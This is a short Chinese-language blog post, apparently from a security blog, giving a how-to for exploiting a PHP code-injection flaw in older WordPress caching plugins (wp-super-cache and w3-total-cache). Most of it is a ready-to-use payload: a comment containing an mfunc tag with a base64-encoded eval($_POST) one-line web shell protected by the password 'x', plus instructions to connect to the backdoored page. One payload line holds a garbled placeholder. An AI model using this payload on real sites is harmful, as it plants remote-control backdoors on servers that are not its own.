存在漏洞的插件名称及版本:

1.wp-super-cache 1.3以下版本

2.w3-total-cache 0.9.2.9以下版本

这两个插件的漏洞官方已经修复.....

漏洞原理是缓存插件在生成一个页面的新缓存时,解析了PHP代码片段。我们将PHP代码写入到目标的文章评论中,当缓存更新后,就可实现插入后门等行为。

两种插件都已测试,都能成功....

利用方法:

在评论的地方插入如下代码:

<!--mfunc eval(base64_decode(redacted, see a trend here)); --><!--/mfunc-->
/*base64加密的诸如*/eval($_POST["i0day"]);/*一句话后门可在这里被执行*/
/*可以利用fopen生成一句话....
<!--mfunc eval(base64_decode(ZXZhbCgkX1BPU1RbIngiXSk7)); --><!--/mfunc-->  一句话  密码  x

成功后直接连接当前页面即可,如http://127.0.0.1/wp/archives/1192
测试phpinfo截图:

转载文章请注明,转载自:小马's Blog https://www.i0day.com

本文链接: https://www.i0day.com/1262.html